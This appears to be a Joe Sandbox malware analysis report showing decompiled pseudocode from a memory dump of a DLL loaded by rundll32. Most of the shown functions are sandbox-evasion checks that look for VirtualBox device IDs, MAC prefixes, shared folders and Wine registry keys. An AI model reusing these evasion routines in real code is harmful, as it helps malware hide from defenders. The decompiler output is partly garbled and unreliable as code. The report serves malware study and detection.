                				E00000215215205F9740(__rax, _v72, L"ACPIBus_BUS_0", __rax,  *_a24, _t145);
                				if (_t99 != 0) goto 0x205ce757;
                				E00000215215205F9740(_t102, _v72, L"PCI_BUS_0", _t135, _t144, _t145);
                				if (_t99 != 0) goto 0x205ce757;
                				E00000215215205F9740(_t102, _v72, L"PNP_BUS_0", _t135, _t144, _t145);
                				if (_t99 == 0) goto 0x205ce759;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_a16 != 0) goto 0x205ce6c0;
                				goto 0x205ce780;
                				if (1 != 3) goto 0x205ce78b;
                				_t74 =  ==  ? r15d : 0;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				_t68 =  ==  ? r15d : 0;
                				return  ==  ? r15d : 0;
                			}




















                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Similarity
                • API ID: String$wcsstr$AllocFreeUninitialize$ClearInitializeVariant
                • String ID: ACPIBus_BUS_0$Name$PCI_BUS_0$PNP_BUS_0$SELECT * FROM Win32_Bus$WQL
                • API String ID: 2365594256-2399075642
                • Opcode ID: ff302871172b224dc8927fc2b44e2653cae8e68db5273b81e6e393684635a794
                • Instruction ID: 1213faf92f01bc72e19dc5ad4059c11d00fbfbed853f36c1a3bcd3c4bc4a413e
                • Opcode Fuzzy Hash: ff302871172b224dc8927fc2b44e2653cae8e68db5273b81e6e393684635a794
                • Instruction Fuzzy Hash: 9D511637702F60C6EB208F25E8886D867A4FBE8B98F140156EE4E57B68DF38D485C740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00000215215205CE1C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				intOrPtr _v72;
                				short _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rbx;
                				void* _t49;
                				void* _t50;
                				void* _t63;
                				void* _t86;
                				intOrPtr* _t95;
                				long long _t115;
                				void* _t126;
                				long long _t131;
                
                				_t115 = __rsi;
                				r15d = 0;
                				_a16 = _t131;
                				_v88 = _t131;
                				_a24 = _t131;
                				_t50 = E00000215215205D0410(_t49,  &_a16,  &_v88, __rsi); // executed
                				if (_t50 == 0) goto 0x205ce38c;
                				_v32 = _t115;
                				_v40 = __rdi;
                				_v48 = __r12;
                				_v56 = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0x205ce28a;
                				if (__rax == 0) goto 0x205ce281;
                				_v96 =  &_a24;
                				_t13 = _t131 + 0x30; // 0x30
                				r9d = _t13;
                				_v104 = _t131;
                				if ( *((intOrPtr*)( *_a16 + 0xa0))() >= 0) goto 0x205ce281;
                				r14d = r15d;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0x205ce29d;
                				__imp__#6();
                				if (r14d == 0) goto 0x205ce37c;
                				_t95 = _a24;
                				_a32 = _t131;
                				_a8 = r15d;
                				if (_t95 == 0) goto 0x205ce358;
                				asm("o16 nop [eax+eax]");
                				_v104 =  &_a8;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t95 + 0x20))();
                				if (_a8 == r15d) goto 0x205ce358;
                				_v96 = _t131;
                				r8d = 0;
                				_v104 = _t131;
                				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x205ce33d;
                				if (_v80 != 8) goto 0x205ce333;
                				E00000215215205F9740(_t86, _v72, L"PCI\\VEN_80EE&DEV_CAFE", _v32,  *_a16, _t126);
                				_t63 =  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_t63 != 0) goto 0x205ce358;
                				if (_a24 != 0) goto 0x205ce2d0;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t63;
                			}





















                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: DeviceId$PCI\VEN_80EE&DEV_CAFE$SELECT * FROM Win32_PnPEntity$WQL
                • API String ID: 1998430482-342862491
                • Opcode ID: 36f45dcf6cc324aea7ea95bfb9e0a4e2e2cf543717673d982e4480679506c767
                • Instruction ID: c585fe8bd358d64fa430458ca78abb5a7ee6c9941f3974655c8e4bc94cdac740
                • Opcode Fuzzy Hash: 36f45dcf6cc324aea7ea95bfb9e0a4e2e2cf543717673d982e4480679506c767
                • Instruction Fuzzy Hash: FB514377302F60CAEB609F25E88869D67A4FB98FA8F141555EE4E13B68DF38D485C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00000215215205CDAE0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				intOrPtr _v72;
                				signed short _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rbx;
                				void* _t51;
                				void* _t52;
                				signed char _t58;
                				void* _t66;
                				void* _t90;
                				intOrPtr* _t99;
                				long long _t119;
                				void* _t130;
                				long long _t135;
                
                				_t119 = __rsi;
                				r15d = 0;
                				_a24 = _t135;
                				_v88 = _t135;
                				_a16 = _t135;
                				_t52 = E00000215215205D0410(_t51,  &_a24,  &_v88, __rsi); // executed
                				if (_t52 == 0) goto 0x205cdcb5;
                				_v32 = _t119;
                				_v40 = __rdi;
                				_v48 = __r12;
                				_v56 = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0x205cdbaa;
                				if (__rax == 0) goto 0x205cdba1;
                				_v96 =  &_a16;
                				_t13 = _t135 + 0x30; // 0x30
                				r9d = _t13;
                				_v104 = _t135;
                				if ( *((intOrPtr*)( *_a24 + 0xa0))() >= 0) goto 0x205cdba1;
                				r14d = r15d;
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0x205cdbbd;
                				__imp__#6();
                				if (r14d == 0) goto 0x205cdca5;
                				_t99 = _a16;
                				_a32 = _t135;
                				_a8 = r15d;
                				if (_t99 == 0) goto 0x205cdc85;
                				asm("o16 nop [eax+eax]");
                				_v104 =  &_a8;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t99 + 0x20))();
                				if (_a8 == r15d) goto 0x205cdc81;
                				_v96 = _t135;
                				r8d = 0;
                				_v104 = _t135;
                				if ( *((intOrPtr*)( *_a32 + 0x20))() < 0) goto 0x205cdc64;
                				_t58 = _v80 & 0x0000ffff;
                				if (_t58 == r12w) goto 0x205cdc64;
                				if ((_t58 & 0x00000008) == 0) goto 0x205cdc5a;
                				E00000215215205F9740(_t90, _v72, L"08:00:27", _v32,  *_a24, _t130);
                				_t66 =  !=  ? r12d : r15d;
                				__imp__#9();
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				if (_t66 != 0) goto 0x205cdc81;
                				if (_a16 != 0) goto 0x205cdbf0;
                				goto 0x205cdc85;
                				 *((intOrPtr*)( *_a16 + 0x10))();
                				 *((intOrPtr*)( *_a24 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return _t66;
                			}






















                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFreeUninitialize$ClearInitializeVariantwcsstr
                • String ID: 08:00:27$MACAddress$SELECT * FROM Win32_NetworkAdapterConfiguration$WQL
                • API String ID: 1998430482-232164535
                • Opcode ID: f7553d1854f0be2efd49074d230f4674e791f10c2249994692fb1fab6cb662e3
                • Instruction ID: 9423f84b308d07ca6a03fc2a1c86dc7d51784a6032e551859d9aa53b5ff9e2c1
                • Opcode Fuzzy Hash: f7553d1854f0be2efd49074d230f4674e791f10c2249994692fb1fab6cb662e3
                • Instruction Fuzzy Hash: 15513873302F60C6EB209F25E88869D77A4FB94BA8F145155EE4E83B68DF38C885C710
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00007FFA7FFA535E2EC0(void* __edx) {
                				void* _t1;
                				void* _t3;
                				void* _t6;
                
                				_t3 = _t6;
                				if (_t3 == 0) goto 0x535e2f01;
                				if (_t3 == 0) goto 0x535e2ef5;
                				if (_t3 == 0) goto 0x535e2ee8;
                				if (_t6 == 1) goto 0x535e2ee1;
                				return _t1;
                			}







                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 3885183344-0
                • Opcode ID: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction ID: bbf71c4312eac89eec456935d9a7b20769ad314045f6b1ccab871f67e16a33f4
                • Opcode Fuzzy Hash: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction Fuzzy Hash: FD519361D3CF034DFA54ABA194422B9225BAFD7380F8CE0B5E68D67797CE2DE445A700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00000215215205F562C(void* __edx) {
                				void* _t5;
                
                				_t5 = __edx;
                				if (_t5 == 0) goto 0x205f566d;
                				if (_t5 == 0) goto 0x205f5661;
                				if (_t5 == 0) goto 0x205f5654;
                				if (__edx == 1) goto 0x205f564d;
                				return 1;
                			}





                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 4221786481-0
                • Opcode ID: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction ID: c792cfa794345ba78b274368cb9817998961e2e67a84cd9762842a68c8924a1e
                • Opcode Fuzzy Hash: ff800ab2db41e843c896150d515926f0aab756e0c4513797aed0fc6be21e75b0
                • Instruction Fuzzy Hash: 92514C33703E61C6FA30BB25A45E3E92694AFF7784FA440D5AE494729FDA3CD4898700
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction ID: f16045952bbbed8eb5e5e975e6fd43af42a711a0127fbcefa6fd8bc98962bfe0
                • Opcode Fuzzy Hash: 240790d4de1382edf41dad9dca8e2698f3845ca8bcdfb4e0c4a6990b92bb54b3
                • Instruction Fuzzy Hash: D331B133206D90C1FB719B28E41A7E663A1FFE4348F900242DE89975A9EF3DD246CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 22%
                			E00000215215205CF630(void* __r9) {
                				signed int _v24;
                				char _v552;
                				char _v1080;
                				char _v1584;
                				void* _v1608;
                				signed char _t17;
                				void* _t20;
                				void* _t24;
                				void* _t25;
                				signed long long _t30;
                				void* _t39;
                				void* _t42;
                				signed long long _t43;
                				void* _t44;
                				void* _t46;
                
                				_t46 = __r9;
                				_t30 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t30 ^ _t43;
                				r8d = 0x208;
                				E00000215215205F8EF0(_t20, 0, _t24, _t25,  &_v552, _t39, _t42, _t44);
                				asm("movups xmm0, [0x728ab]");
                				asm("movsd xmm1, [0x728ac]");
                				r8d = 0x1f0;
                				asm("movaps [esp+0x20], xmm0");
                				asm("movsd [esp+0x30], xmm1");
                				E00000215215205F8EF0(_t20, 0, _t24, _t25,  &_v1584, _t39, _t42, _t44);
                				if (E00000215215205D00A0() == 0) goto 0x205cf6b0;
                				r8d = 0x104;
                				ExpandEnvironmentStringsW(??, ??, ??);
                				goto 0x205cf6bf;
                				r9d = 0;
                				_t5 = _t46 + 0x26; // 0x26
                				r8d = _t5;
                				__imp__SHGetSpecialFolderPathW();
                				__imp__PathCombineW();
                				_t17 = GetFileAttributesW(??); // executed
                				if (_t17 == 0xffffffff) goto 0x205cf70e;
                				if ((_t17 & 0x00000010) == 0) goto 0x205cf70e;
                				return E00000215215205F59D0(0, _v24 ^ _t43,  &_v1080, _t46);
                			}



















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Path$AttributesCombineEnvironmentExpandFileFolderSpecialStrings
                • String ID: %ProgramW6432%
                • API String ID: 3127241168-1092591020
                • Opcode ID: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction ID: 6d10b54b1142abde356f056693f0d2a1063605b0cde37b8d69bf06e3a670183d
                • Opcode Fuzzy Hash: b59245fd65e9b791ab1eaa45c61e82f27590b30b7f03f9e56fb6d21ffa3f5bbc
                • Instruction Fuzzy Hash: D4218033316DA0C1FB709B24E85A7EA6361FFE5344F900152DE8A469A9DF3DC255CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00000215215205D0130(void* __rdx, void* __r8, void* __r9) {
                				signed int _v40;
                				char _v2088;
                				char _v2096;
                				char _v2104;
                				long long _v2112;
                				long long _v2120;
                				void* __rdi;
                				long _t17;
                				long _t18;
                				void* _t24;
                				void* _t26;
                				void* _t27;
                				signed long long _t32;
                				long long _t36;
                				void* _t50;
                				signed long long _t52;
                
                				_t54 = __r9;
                				_t32 =  *0x2067c720; // 0xca1645d940e
                				_v40 = _t32 ^ _t52;
                				_v2104 = 0;
                				r8d = 0x800;
                				_t50 = __r9;
                				E00000215215205F8EF0(_t24, 0, _t26, _t27,  &_v2088, __rdx, __r9, __r8);
                				_v2096 = 0x104;
                				r9d = 0x20019;
                				_v2120 =  &_v2104;
                				r8d = 0;
                				_t17 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                				if (_t17 != 0) goto 0x205d01fc;
                				_v2112 =  &_v2096;
                				r9d = 0;
                				_t36 =  &_v2088;
                				r8d = 0;
                				_v2120 = _t36;
                				_t18 = RegQueryValueExW(??, ??, ??, ??, ??, ??); // executed
                				if (_t18 != 0) goto 0x205d01f1;
                				__imp__StrStrIW();
                				if (_t36 == 0) goto 0x205d01f1;
                				RegCloseKey(??);
                				goto 0x205d01fe;
                				RegCloseKey(??); // executed
                				return E00000215215205F59D0(_t24, _v40 ^ _t52, _t50, _t54);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID:
                • API String ID: 1607946009-0
                • Opcode ID: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction ID: 74deb5944c477600fcbf11e445a648a10e67c29a8c3bd6bf7f019bd29712d979
                • Opcode Fuzzy Hash: 55a56b10943a406aeb13849472735ca925f2f98bffe12306ae4cdfa32b233224
                • Instruction Fuzzy Hash: 8F214C73325E9086EA608B11F858B9AA3A0FFD8B94F505125AE8D47B98DF3CC449CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 61%
                			E00000215215205CF230(void* __eflags, void* __rdx) {
                				signed int _v24;
                				char _v536;
                				char _v552;
                				long long _v568;
                				long _t11;
                				void* _t15;
                				void* _t18;
                				void* _t19;
                				signed long long _t23;
                				void* _t34;
                				signed long long _t35;
                				void* _t36;
                
                				_t23 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t23 ^ _t35;
                				r8d = 0x200;
                				E00000215215205F8EF0(_t15, 0, _t18, _t19,  &_v536, __rdx, _t34, _t36);
                				E00000215215205CD1D0(_t15, _t23 ^ _t35,  &_v536, __rdx, L"Checking reg key %s ", L"SOFTWARE\\Wine");
                				_v552 = 0;
                				r9d = 0x20019;
                				_v568 =  &_v552;
                				r8d = 0;
                				_t11 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
                				if (_t11 != 0) goto 0x205cf2d4;
                				RegCloseKey(??);
                				return E00000215215205F59D0(_t15, _v24 ^ _t35, L"SOFTWARE\\Wine", L"SOFTWARE\\Wine");
                			}
















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpen
                • String ID: Checking reg key %s $SOFTWARE\Wine
                • API String ID: 47109696-2978923392
                • Opcode ID: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction ID: 794742edf209dd9bb1514a17fa36caf5f65cd309053f13cf7dab1ec84c5cfcb6
                • Opcode Fuzzy Hash: aca2282ee8955166689f40ec5f0f89f9c8b39eb2a9a0a893a35249dd975d82ff
                • Instruction Fuzzy Hash: D4113937726E90C2FB70DB20E8597EA2360FBE5754F900152AE9E56A99DF7CC149CB00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$AllocQuery
                • String ID:
                • API String ID: 31662377-0
                • Opcode ID: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction ID: 9fa21fa5b97cfd8d6e7e2686763bf7463982c94a7bf28f883306925626997323
                • Opcode Fuzzy Hash: fc9c0bc593f962cbe64dea5118a7e4a816657dd97a63b27e4f18f9465b597b42
                • Instruction Fuzzy Hash: 54318333317A64C1FE218B11A50D7956B90ABE4FF8F194565FE5E17B8CEA7CCA418B00
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEE65
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEEC7
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF01
                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF2B
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 1557788787-0
                • Opcode ID: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction ID: c642c8e6f55a933ada6c5ae1589ddf869c047f612db210b5182ab2b7cf1b367b
                • Opcode Fuzzy Hash: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction Fuzzy Hash: C3216421E39B9585E6209F11644002AB6A9FF89BD0B4CA174DE9E73BD8DF3CE4519740
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 1557788787-0
                • Opcode ID: 924d1869527f3f978518873688abb954fa56a4a06a89cfa16734781b5ab1994e
                • Instruction ID: ec20714ff1b21cc618ba10a6597ebab26782485fb2c7304a9721139acfa9db2c
                • Opcode Fuzzy Hash: 924d1869527f3f978518873688abb954fa56a4a06a89cfa16734781b5ab1994e
                • Instruction Fuzzy Hash: CD21A932706FA0C2EA308F12644825AA7A4FFE4BD0F284565DE9A67B9CDF38D4528700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00000215215205CA748(void* __edi, long long __rax, long long __rbx, long long __rdi, long long __r9, long long _a8, long long _a16, char _a32) {
                				void* _t16;
                				intOrPtr _t24;
                				void* _t25;
                				long long _t42;
                				intOrPtr* _t43;
                				signed long long _t44;
                				intOrPtr* _t52;
                				intOrPtr _t53;
                				void* _t61;
                				char* _t63;
                
                				_t60 = __r9;
                				_t42 = __rax;
                				_a8 = __rbx;
                				_a16 = __rdi;
                				_a32 = __r9;
                				GetModuleHandleA(??);
                				if (__rax == 0) goto 0x205ca811;
                				_a32 = __rax;
                				E00000215215205CB35C(_t25,  &_a32, "RtlExitUserProcess", _t61); // executed
                				if (_t42 == 0) goto 0x205ca811;
                				 *0x206830ac = 1;
                				if ( *0x206830ac == 1) goto 0x205ca796;
                				_t52 =  *0x20683320; // 0x2151e660000
                				if (_t52 == 0) goto 0x205ca7fb;
                				_t24 =  *0x2068332c; // 0xa
                				if (_t24 == 0) goto 0x205ca7cf;
                				_t43 = _t52;
                				if ( *_t43 == 0) goto 0x205ca805;
                				_t44 = _t43 + 0x3c;
                				if (1 - _t24 < 0) goto 0x205ca7c1;
                				if (1 == 0xffffffff) goto 0x205ca7fb;
                				_t63 = _t44 * 0x3c + _t52;
                				_t53 = _a32;
                				 *((long long*)(_t63 + 1)) = _t42;
                				_t16 = E00000215215205CA568(_t44, __rbx, _t63, _t53, _t42, _t60); // executed
                				if (_t16 != 0) goto 0x205ca7fb;
                				 *_t63 = 0;
                				 *0x206830ac = 0;
                				goto 0x205ca814;
                				 *((char*)(_t44 * 0x3c + _t53)) = 1;
                				goto 0x205ca7d2;
                				return 0xffffffff;
                			}














                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: HandleModulelstrcmp
                • String ID: RtlExitUserProcess$ntdll.dll
                • API String ID: 4066981444-1735925572
                • Opcode ID: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction ID: 9c8aaecd2ff8e9149a5b0cc5273ecf47ecea189f77905a9a42faad4e67a28855
                • Opcode Fuzzy Hash: 06c4cfafe3bdbe6131d3fb27be968274d94a8257f10f16205c0f732da387a440
                • Instruction Fuzzy Hash: 4421CB33307FA0C6FA25CB1DA8982956AA2FFE4774F244259ED65077E8DA39C4428700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00000215215205CD990() {
                				signed int _v24;
                				char _v552;
                				intOrPtr _v568;
                				int _t11;
                				void* _t14;
                				void* _t19;
                				void* _t20;
                				signed long long _t24;
                				void* _t30;
                				void* _t33;
                				signed long long _t34;
                				void* _t35;
                				void* _t37;
                
                				_t24 =  *0x2067c720; // 0xca1645d940e
                				_v24 = _t24 ^ _t34;
                				r8d = 0x208;
                				E00000215215205F8EF0(_t14, 0, _t19, _t20,  &_v552, _t30, _t33, _t35);
                				_v568 = 0x104;
                				_t11 = WNetGetProviderNameW(??, ??, ??); // executed
                				if (_t11 != 0) goto 0x205cda0f;
                				__imp__StrCmpIW();
                				return E00000215215205F59D0(0 | _t11 == 0x00000000, _v24 ^ _t34, L"VirtualBox Shared Folders", _t37);
                			}

















                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: NameProvider
                • String ID: VirtualBox Shared Folders
                • API String ID: 262172401-2247368375
                • Opcode ID: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction ID: d9cf175afdad96f9e2aab2302c86142ab49aa66a9cca91f2c1473cf59434ecd7
                • Opcode Fuzzy Hash: 58885f4abb19d5f845a99889267d7b302267c01fe6a5ffc64e6a71858df7a291
                • Instruction Fuzzy Hash: B6012C76315E90C2FB749B24E85D3EA6390FBE9755FC000569A8E92699EF7CD105CA00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00007FFA7FFA535E33BC(void* __ecx) {
                				void* __rbx;
                				void* _t7;
                				void* _t8;
                				void* _t9;
                				void* _t19;
                				void* _t20;
                
                				_t8 = __ecx;
                				E00007FFA7FFA535E3914(_t7, _t9, ( *0x53754b08 & 0x000000ff) + 0x17172f, 0x1, _t19, _t20);
                				if (E00007FFA7FFA535E42EC() != 0) goto 0x535e33eb;
                				goto 0x535e33ff; // executed
                				E00007FFA7FFA535E7DD4(( *0x53754b08 & 0x000000ff) + 0x17172f); // executed
                				if (0 != 0) goto 0x535e33fd;
                				E00007FFA7FFA535E4348(_t8);
                				goto 0x535e33e7;
                				return _t7;
                			}










                APIs
                • __isa_available_init.LIBCMT ref: 00007FFA535E33D9
                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFA535E33DE
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA535E42F0
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA535E42F5
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA535E42FA
                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA535E33F6
                Memory Dump Source
